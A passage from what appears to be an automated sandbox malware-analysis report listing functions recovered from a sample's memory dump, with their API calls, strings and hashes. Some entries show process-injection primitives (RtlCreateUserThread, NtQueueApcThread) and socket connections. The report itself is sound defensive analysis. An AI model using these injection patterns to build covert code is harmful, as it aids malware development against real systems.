                            • shutdown.WS2_32(00000000,00000002), ref: 00DB8E0B
                            • shutdown.WS2_32(00000000,00000002), ref: 00DB8E18
                            • closesocket.WS2_32(00000000), ref: 00DB8E1D
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: CountTickshutdown$closesocket
                            • String ID:
                            • API String ID: 3414035747-0
                            • Opcode ID: e648d81ad432562b11f5d78aa775d84032beb3a980eb177d2e375d1165265f1d
                            • Instruction ID: a4676d54291d02a1e622f39bba19d72c204595e4385f3df1b2a1c52ffb94ec41
                            • Opcode Fuzzy Hash: e648d81ad432562b11f5d78aa775d84032beb3a980eb177d2e375d1165265f1d
                            • Instruction Fuzzy Hash: 6B116D31600711CFDB316F25D844A56B7E8FF14726B598A1FE88793690EB31EC40EAB0
                            Function 00DD0B1E Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • __getptd.LIBCMT ref: 00DD0B2A
                              • Part of subcall function 00DCD797: __getptd_noexit.LIBCMT ref: 00DCD79A
                              • Part of subcall function 00DCD797: __amsg_exit.LIBCMT ref: 00DCD7A7
                            • __amsg_exit.LIBCMT ref: 00DD0B4A
                            • __lock.LIBCMT ref: 00DD0B5A
                            • InterlockedDecrement.KERNEL32(?), ref: 00DD0B77
                            • InterlockedIncrement.KERNEL32(010F1658), ref: 00DD0BA2
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                            • String ID:
                            • API String ID: 4271482742-0
                            • Opcode ID: 79846ed2f038d75640f027a51c1cc11113c9686a040b3b89f8f2f6866cd38324
                            • Instruction ID: 02a534a5c1651b2e959804ef2d8cc5581052e3f3a8fd5c51ee6a167de8b684ba
                            • Opcode Fuzzy Hash: 79846ed2f038d75640f027a51c1cc11113c9686a040b3b89f8f2f6866cd38324
                            • Instruction Fuzzy Hash: 0D01C432905B52DBDB10BB64E845B5DBB60FF40728F16005BF408A7380CB34A941CBF5
                            Function 00DB3615 Relevance: 7.5, APIs: 5, Instructions: 45networkCOMMON
                            Download Yara Rule
                            APIs
                            • socket.WS2_32(00000002,00000001,00000000), ref: 00DB3622
                            • gethostbyname.WS2_32(?), ref: 00DB3636
                            • htons.WS2_32(?), ref: 00DB365F
                            • connect.WS2_32(00000000,?,00000010), ref: 00DB366F
                            • closesocket.WS2_32(00000000), ref: 00DB3679
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: closesocketconnectgethostbynamehtonssocket
                            • String ID:
                            • API String ID: 530611402-0
                            • Opcode ID: 9641cfb47082cf249cdf01a0311c87404ee51f5d4bd888ba294c073b903a0ca5
                            • Instruction ID: 03fd88bdfef91de2f183f346468164cb2bf7f29c292e31ec426390afa36e4651
                            • Opcode Fuzzy Hash: 9641cfb47082cf249cdf01a0311c87404ee51f5d4bd888ba294c073b903a0ca5
                            • Instruction Fuzzy Hash: 25F0A935904154B9DB1077A89C06FEE7768DF04720F054256FD619A3D2F6B0DA01A3B9
                            Function 00D7E06F Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                            Download Yara Rule
                            APIs
                            • _malloc.LIBCMT ref: 00D7E076
                              • Part of subcall function 00D87BFF: __FF_MSGBANNER.LIBCMT ref: 00D87C22
                              • Part of subcall function 00D87BFF: __NMSG_WRITE.LIBCMT ref: 00D87C29
                            • _malloc.LIBCMT ref: 00D7E083
                            • _malloc.LIBCMT ref: 00D7E09E
                            • __snprintf.LIBCMT ref: 00D7E0B1
                            • _malloc.LIBCMT ref: 00D7E0D0
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _malloc$__snprintf
                            • String ID:
                            • API String ID: 1839626857-0
                            • Opcode ID: 60909d306269a7eecaa14b08a4ba8db20eb602b3f16b7d79ac9f69fbaa477fbb
                            • Instruction ID: ca55f284f1373cd0eb83c4d0a2b407d31dc94a10c01c75dcaf27feab60d7af6d
                            • Opcode Fuzzy Hash: 60909d306269a7eecaa14b08a4ba8db20eb602b3f16b7d79ac9f69fbaa477fbb
                            • Instruction Fuzzy Hash: 75016D70904304AFD710AF7DCC85D96BBE9EF45B50B108829F489CB201DA74E9048BB0
                            Function 00DC8722 Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • __lock.LIBCMT ref: 00DC8740
                              • Part of subcall function 00DCA8AA: __mtinitlocknum.LIBCMT ref: 00DCA8C0
                              • Part of subcall function 00DCA8AA: __amsg_exit.LIBCMT ref: 00DCA8CC
                              • Part of subcall function 00DCA8AA: EnterCriticalSection.KERNEL32(00000000,00000000,?,00DCD842,0000000D,00DE3748,00000008,00DCD939,00000000,?,00DCA4DC,00000000,?,?,?,00DCA53F), ref: 00DCA8D4
                            • ___sbh_find_block.LIBCMT ref: 00DC874B
                            • ___sbh_free_block.LIBCMT ref: 00DC875A
                            • HeapFree.KERNEL32(00000000,00000000,00DE35A0,0000000C,00DCD788,00000000,?,00DD181E,00000000,00000001,00000000,?,00DCA834,00000018,00DE3700,0000000C), ref: 00DC878A
                            • GetLastError.KERNEL32(?,00DD181E,00000000,00000001,00000000,?,00DCA834,00000018,00DE3700,0000000C,00DCA8C5,00000000,00000000,?,00DCD842,0000000D), ref: 00DC879B
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                            • String ID:
                            • API String ID: 2714421763-0
                            • Opcode ID: 053a01f93b52186d4cef23e8829c127f682d9f5161bb8fae5ae50e1db949a0ce
                            • Instruction ID: 0cc592fe899219b58e789432d132df80554d2ec84c2e88833dfba4fecd8e50ea
                            • Opcode Fuzzy Hash: 053a01f93b52186d4cef23e8829c127f682d9f5161bb8fae5ae50e1db949a0ce
                            • Instruction Fuzzy Hash: FC017C3180134BEADF207BB49C4AF5A7660EF00325F34421EF010A71D1EF388941ABB5
                            Function 00DB795C Relevance: 7.5, APIs: 5, Instructions: 40sleeppipeCOMMON
                            Download Yara Rule
                            APIs
                            • GetTickCount.KERNEL32 ref: 00DB7969
                            • GetTickCount.KERNEL32 ref: 00DB7970
                            • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 00DB7983
                            • Sleep.KERNEL32(0000000A), ref: 00DB7994
                            • GetTickCount.KERNEL32 ref: 00DB799A
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: CountTick$NamedPeekPipeSleep
                            • String ID:
                            • API String ID: 1593283408-0
                            • Opcode ID: e33b8ee4d509cbaa7e22547efe213dc07548808b1da4a93eff5061643f006acd
                            • Instruction ID: da5f1ddd6e713d437e3e828795ee4402d2e77c88975a00f47b9491af52a409f4
                            • Opcode Fuzzy Hash: e33b8ee4d509cbaa7e22547efe213dc07548808b1da4a93eff5061643f006acd
                            • Instruction Fuzzy Hash: 28F08272A1561CFFEF015BB9DC819FE779DEB842A97240437E502D2110E6709D018E71
                            Function 00DBC0FD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 140COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: __snprintf$_strncmp
                            • String ID: abcdefghijklmnop
                            • API String ID: 3493850238-2486878355
                            • Opcode ID: a7f402e130d5f3bc8409ac211332a33f512d31577d2d744c98ca2d1b3f6222a0
                            • Instruction ID: 77f45a04e85c2a8c525cb4a31acca566186bb2177ec676f07ed7c33e3c241049
                            • Opcode Fuzzy Hash: a7f402e130d5f3bc8409ac211332a33f512d31577d2d744c98ca2d1b3f6222a0
                            • Instruction Fuzzy Hash: B741867691060ABEEB01DEB8DD41DEFB3B9EB453447140525E901F7152EA31EE0986B1
                            Function 00D8BD6B Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 133COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: $2$l
                            • API String ID: 0-3132104027
                            • Opcode ID: eb474567eacfc3d501f5e1b6ebaa72d776817f12a42b620c1f05cf73adb88cac
                            • Instruction ID: b1fb84cbc2f5422918eda8fa5628d64b176e0e3dc9642a10597da187c76c316f
                            • Opcode Fuzzy Hash: eb474567eacfc3d501f5e1b6ebaa72d776817f12a42b620c1f05cf73adb88cac
                            • Instruction Fuzzy Hash: F441D3B0814268CEDF34EE2488C93E87BB1AB15325F5811DBD199A6192C7749EC6CF71
                            Function 00D8AFBA Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: $2$l
                            • API String ID: 0-3132104027
                            • Opcode ID: a08bc20fbbed711a2771cefccfc8b9c6e4fe8b13b47a8aeaf76eb1eac6ba00ff
                            • Instruction ID: 68dd2f42547254771ec9991ecfe4bdf7cbbbd3b40fdb8df0bdf74deed640ed5e
                            • Opcode Fuzzy Hash: a08bc20fbbed711a2771cefccfc8b9c6e4fe8b13b47a8aeaf76eb1eac6ba00ff
                            • Instruction Fuzzy Hash: 7C41B234845268CADF34AF1888D83E87BB5AB0A725F1841DBC0E966292C7755EC7CF31
                            Function 00DBC130 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: __snprintf$_strncmp
                            • String ID: abcdefghijklmnop
                            • API String ID: 3493850238-2486878355
                            • Opcode ID: 0a7cddd77f77a3c14efd208771b89d3aa1c8a243f8d05003eacb4dae7584cda8
                            • Instruction ID: 520590dd50023b1bdc3d304e6cac2bf9a280b617087a317d6ac865c978bed9a5
                            • Opcode Fuzzy Hash: 0a7cddd77f77a3c14efd208771b89d3aa1c8a243f8d05003eacb4dae7584cda8
                            • Instruction Fuzzy Hash: CB31967290020AABDB01EFA8DD81DEE73ADEF55344B244525F901EB142FE31EB0987B0
                            Function 00DB9977 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: __snprintf$_memset
                            • String ID: %s%s
                            • API String ID: 444161222-3438391663
                            • Opcode ID: 150cda856f10910070ed4b4f88eeaceee9300f434e588ab47c43b8c1a344e857
                            • Instruction ID: 47bc3bc7b86326fbc84c7931e0ce2241bc0dcf67c7d89c7c3f2427ea90e6e3f7
                            • Opcode Fuzzy Hash: 150cda856f10910070ed4b4f88eeaceee9300f434e588ab47c43b8c1a344e857
                            • Instruction Fuzzy Hash: D401CC71104285EFCB01DF10C894F9BBBA5EF8A710F584559FA865B262D731D908DB72
                            Function 00DBC9F8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 00DBCA03
                            • GetCurrentProcess.KERNEL32(00DB1A51), ref: 00DBCA1D
                              • Part of subcall function 00DBC960: _memset.LIBCMT ref: 00DBC97A
                              • Part of subcall function 00DBC960: __snprintf.LIBCMT ref: 00DBC9D9
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _memset$CurrentProcess__snprintf
                            • String ID: system32$syswow64
                            • API String ID: 3270679572-3098820961
                            • Opcode ID: 38057ed0a5d0da93945676376c2c123e4956c99e8dddf32fa9c786a7f94d464b
                            • Instruction ID: 8fea28c2270a03ba7e1e9cf78de2879486e8b438fc82fbf0cc374bb101d827e2
                            • Opcode Fuzzy Hash: 38057ed0a5d0da93945676376c2c123e4956c99e8dddf32fa9c786a7f94d464b
                            • Instruction Fuzzy Hash: F8F0BE31685308AEF704B750BC47FAA3798EF01754F08101AF80AAA3C2EA6165008579
                            Function 00DB6BCF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleHandleA.KERNEL32(ntdll.dll,RtlCreateUserThread,00000000,?,?,00DB62F7,00000000,00000000,00000000,00000000,?,00DB65ED,00000000,00000000,00000000), ref: 00DB6BE5
                            • GetProcAddress.KERNEL32(00000000), ref: 00DB6BEC
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressHandleModuleProc
                            • String ID: RtlCreateUserThread$ntdll.dll
                            • API String ID: 1646373207-2935400652
                            • Opcode ID: ea4727518f9e494092efa8d2058f1ba9b0c7448335bf6eba6cd1e4673076cf77
                            • Instruction ID: b85cc6219aaa65d139d77ac08624d287af88fe2b740690f27df781cd01419bdb
                            • Opcode Fuzzy Hash: ea4727518f9e494092efa8d2058f1ba9b0c7448335bf6eba6cd1e4673076cf77
                            • Instruction Fuzzy Hash: D9F03076902224FBCF11AFE18C098DE7F69EB04B10B558516F51692150D7749B54DBA0
                            Function 00DB6BCF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleHandleA.KERNEL32(00DE16AC,00DE16B8), ref: 00DB6BE5
                            • GetProcAddress.KERNEL32(00000000), ref: 00DB6BEC
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressHandleModuleProc
                            • String ID: RtlCreateUserThread$ntdll.dll
                            • API String ID: 1646373207-2935400652
                            • Opcode ID: ea4727518f9e494092efa8d2058f1ba9b0c7448335bf6eba6cd1e4673076cf77
                            • Instruction ID: b85cc6219aaa65d139d77ac08624d287af88fe2b740690f27df781cd01419bdb
                            • Opcode Fuzzy Hash: ea4727518f9e494092efa8d2058f1ba9b0c7448335bf6eba6cd1e4673076cf77
                            • Instruction Fuzzy Hash: D9F03076902224FBCF11AFE18C098DE7F69EB04B10B558516F51692150D7749B54DBA0
                            Function 00DB67F1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 29libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleHandleA.KERNEL32(ntdll,NtQueueApcThread,?,00DB63DD,00000000,00000000), ref: 00DB67FE
                            • GetProcAddress.KERNEL32(00000000), ref: 00DB6805
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressHandleModuleProc
                            • String ID: NtQueueApcThread$ntdll
                            • API String ID: 1646373207-1374908105
                            • Opcode ID: 141f568c23265b4727e7a3b13ffd6f2c550093efd5daaae3e86fd1c6eb7af968
                            • Instruction ID: c1f397498e0adfdea73730af60399a82e1d460b80e5d8c4138fff79b02db22b3
                            • Opcode Fuzzy Hash: 141f568c23265b4727e7a3b13ffd6f2c550093efd5daaae3e86fd1c6eb7af968
                            • Instruction Fuzzy Hash: ECE0DF3E340705BBDF202FB5AC02B9E3B99AF04B64F10852AF52EC50E0EB32D4505A34
                            Function 00DB98E8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: __snprintf_memset
                            • String ID: %s&%s$?%s
                            • API String ID: 2657849664-1750478248
                            • Opcode ID: 9dcc7895b22ee8def29aa9ce0e0ec205ca7744b3a2a839994267200949d5a36d
                            • Instruction ID: c1a1ea452f8bed48b6788424ad143bfdad72c7428b35ef91f3acc8b39f187e7a
                            • Opcode Fuzzy Hash: 9dcc7895b22ee8def29aa9ce0e0ec205ca7744b3a2a839994267200949d5a36d
                            • Instruction Fuzzy Hash: 5BF030B5514384FFD710EB54CD82FABB7ACEB85700F84555EBA4256142E630D904DB32
                            Function 00DB4354 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,00DB80DF), ref: 00DB4366
                            • GetProcAddress.KERNEL32(00000000), ref: 00DB436D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressHandleModuleProc
                            • String ID: IsWow64Process$kernel32
                            • API String ID: 1646373207-3789238822
                            • Opcode ID: 816fa3ad8d5365524cf00bbe74b58302ee03789401e042bed99538d8b8dbf25c
                            • Instruction ID: b16a82cb7c2139e04b5c2036b1cc79e437b753d75b41075fb1eb96375a7f2ece
                            • Opcode Fuzzy Hash: 816fa3ad8d5365524cf00bbe74b58302ee03789401e042bed99538d8b8dbf25c
                            • Instruction Fuzzy Hash: FDE0EC7474030AFBDF00DBE6DD1AA9D77BCAB4079DF540155B402E2291DBB4DA449730
                            Function 00DB4354 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22libraryloaderCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • GetModuleHandleA.KERNEL32(00DE1588,00DE1578,?,?,00DB80DF), ref: 00DB4366
                            • GetProcAddress.KERNEL32(00000000), ref: 00DB436D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressHandleModuleProc
                            • String ID: IsWow64Process$kernel32
                            • API String ID: 1646373207-3789238822
                            • Opcode ID: 816fa3ad8d5365524cf00bbe74b58302ee03789401e042bed99538d8b8dbf25c
                            • Instruction ID: b16a82cb7c2139e04b5c2036b1cc79e437b753d75b41075fb1eb96375a7f2ece
                            • Opcode Fuzzy Hash: 816fa3ad8d5365524cf00bbe74b58302ee03789401e042bed99538d8b8dbf25c
                            • Instruction Fuzzy Hash: FDE0EC7474030AFBDF00DBE6DD1AA9D77BCAB4079DF540155B402E2291DBB4DA449730
                            Function 00DB5450 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleHandleA.KERNEL32(kernel32,Wow64DisableWow64FsRedirection,?,00DB3465,?), ref: 00DB545D
                            • GetProcAddress.KERNEL32(00000000), ref: 00DB5464
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressHandleModuleProc
                            • String ID: Wow64DisableWow64FsRedirection$kernel32
                            • API String ID: 1646373207-736604160
                            • Opcode ID: 9e8ad9c43bff05399fd74dcd06e414064ae2bc51927056bc65490323afb48f0f
                            • Instruction ID: 48cf562b06b8911942e116e91a01db8996c58910b9029bbed5e83203e33431d9
                            • Opcode Fuzzy Hash: 9e8ad9c43bff05399fd74dcd06e414064ae2bc51927056bc65490323afb48f0f
                            • Instruction Fuzzy Hash: DCC01238381708BB8B002BF2EC099093BACEA84A66B444023B40AC1260CF7185808674
                            Function 00DB5475 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleHandleA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,?,00DB3484,?,00000000,00000002), ref: 00DB5482
                            • GetProcAddress.KERNEL32(00000000), ref: 00DB5489
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressHandleModuleProc
                            • String ID: Wow64RevertWow64FsRedirection$kernel32
                            • API String ID: 1646373207-3900151262
                            • Opcode ID: 3a06deaafb9e6fff88f1f1cdb6a08b667fedff7807c50727afe6fde3c4d13312
                            • Instruction ID: fabdd5e205e1fa8ea7b239fb7a7e2ec21c1b3a8b9ecb917a8c7dc16003eaebce
                            • Opcode Fuzzy Hash: 3a06deaafb9e6fff88f1f1cdb6a08b667fedff7807c50727afe6fde3c4d13312
                            • Instruction Fuzzy Hash: F0C08C38381708FF8F003BF7EC0AA093B2CFA81B663444023B40AC1260CF71C4808670
                            Function 00DB1DEA Relevance: 6.4, APIs: 4, Instructions: 389COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00DB8250: htonl.WS2_32(8900DF3A), ref: 00DB8266
                            • GetLastError.KERNEL32(?,00000000,00000080,?,?,00DB558E,00DE81B0,00000000), ref: 00DB2036
                              • Part of subcall function 00DBD9B2: GetCurrentProcess.KERNEL32(000F003F,00000000,00000000,?,00000000,00000001,00000000,D78B5955,00000000,?,?,00DB1FCE,00000000,000F003F,?,00000000), ref: 00DBDA21
                            • _memset.LIBCMT ref: 00DB21A8
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: CurrentErrorLastProcess_memsethtonl
                            • String ID:
                            • API String ID: 529797354-0
                            • Opcode ID: 36510c69aab29577729562bc8e987c29ec9aba271a739a827c7b36223c6f7f94
                            • Instruction ID: 5551bd0835241b6133d21f45a56c426bd3291c89af8eac6f9d194f1d95174d9d
                            • Opcode Fuzzy Hash: 36510c69aab29577729562bc8e987c29ec9aba271a739a827c7b36223c6f7f94
                            • Instruction Fuzzy Hash: AEC179B2A10B01DFE720DF69CC81AA673E5FB88304B18893DE587D6651E734E546DB30
                            Function 00DB1DEA Relevance: 6.4, APIs: 4, Instructions: 389COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • GetLastError.KERNEL32(?,00000000,00000080,?,?,00DB558E,00DE81B0,00000000), ref: 00DB2036
                              • Part of subcall function 00DBD9B2: GetCurrentProcess.KERNEL32(000F003F,00000000,00000000,?,00000000,00000001,00000000,D78B5955,00000000,?,?,00DB1FCE,00000000,000F003F,?,00000000), ref: 00DBDA21
                            • _memset.LIBCMT ref: 00DB21A8
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: CurrentErrorLastProcess_memset
                            • String ID:
                            • API String ID: 652633832-0
                            • Opcode ID: 2ebb31ecf83318c086477f3e39be9516fb3890de3afaf3b0a436e576864611f8
                            • Instruction ID: 5551bd0835241b6133d21f45a56c426bd3291c89af8eac6f9d194f1d95174d9d
                            • Opcode Fuzzy Hash: 2ebb31ecf83318c086477f3e39be9516fb3890de3afaf3b0a436e576864611f8
                            • Instruction Fuzzy Hash: AEC179B2A10B01DFE720DF69CC81AA673E5FB88304B18893DE587D6651E734E546DB30
                            Function 00D7203F Relevance: 6.2, APIs: 4, Instructions: 186COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 00D72080
                            • __snprintf.LIBCMT ref: 00D720A7
                              • Part of subcall function 00D789F6: _memset.LIBCMT ref: 00D78A17
                            • __snprintf.LIBCMT ref: 00D72123
                              • Part of subcall function 00D752EC: _memset.LIBCMT ref: 00D752FC
                              • Part of subcall function 00D752EC: _memset.LIBCMT ref: 00D75308
                              • Part of subcall function 00D752EC: __snprintf.LIBCMT ref: 00D75359
                              • Part of subcall function 00D752EC: _memset.LIBCMT ref: 00D75390
                              • Part of subcall function 00D752EC: _memset.LIBCMT ref: 00D7539B
                              • Part of subcall function 00D753B6: _memset.LIBCMT ref: 00D753C6
                              • Part of subcall function 00D753B6: _memset.LIBCMT ref: 00D753D2
                              • Part of subcall function 00D753B6: __snprintf.LIBCMT ref: 00D7542E
                              • Part of subcall function 00D753B6: _memset.LIBCMT ref: 00D7544C
                              • Part of subcall function 00D753B6: _memset.LIBCMT ref: 00D75457
                            • __snprintf.LIBCMT ref: 00D7213A
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _memset$__snprintf
                            • String ID:
                            • API String ID: 1922369481-0
                            • Opcode ID: ead7a9399f8d34496f40cd949b27a9a8331296bddb999b6bbc598e89ded7c35d
                            • Instruction ID: f5783c8531328dfe1a8ffefc928b194b361c4127caaa9b8e242be62eb6e7924e
                            • Opcode Fuzzy Hash: ead7a9399f8d34496f40cd949b27a9a8331296bddb999b6bbc598e89ded7c35d
                            • Instruction Fuzzy Hash: 02519F72900259BFDB12AFA4DC85DFE7BB8FF05310F148069FA18A7161EB309A458B75
                            Function 00DB4CCD Relevance: 6.1, APIs: 4, Instructions: 143COMMON
                            Download Yara Rule
                            APIs
